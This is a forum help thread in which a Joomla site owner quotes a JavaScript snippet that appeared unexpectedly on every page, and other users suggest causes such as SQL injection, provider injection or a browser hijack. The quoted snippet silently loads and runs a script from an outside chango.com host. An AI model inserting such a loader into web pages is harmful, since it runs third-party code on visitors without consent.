i get this code on all my pages.don't know why.NY HELP PLEASE
var chd = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();

Recommended Answers

All 5 Replies

What is your page? It looks like a non-closed or open <script> tag

Have you looked at your source code? Is it embedded somewhere in an include file or all of your pages?

Do you pull data from a datasource like a DB table and maybe this your site was compromised by SQL injection?

If the text above is just displayed only your page when you access it, it would seem that whoever snuck that javascript in your pages didn't wrap it within a script element.

so how do i get it out.am using a joomla template and it happened all of a sudden.meanwhile the site is not hosted so how could someone get in there.pls

not happy to say or tell this but I suspect it is being injected by your provider.

That looks more like a browser hijack, especially if its not being hosted.

Check your system with MBAM or Adaware.

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.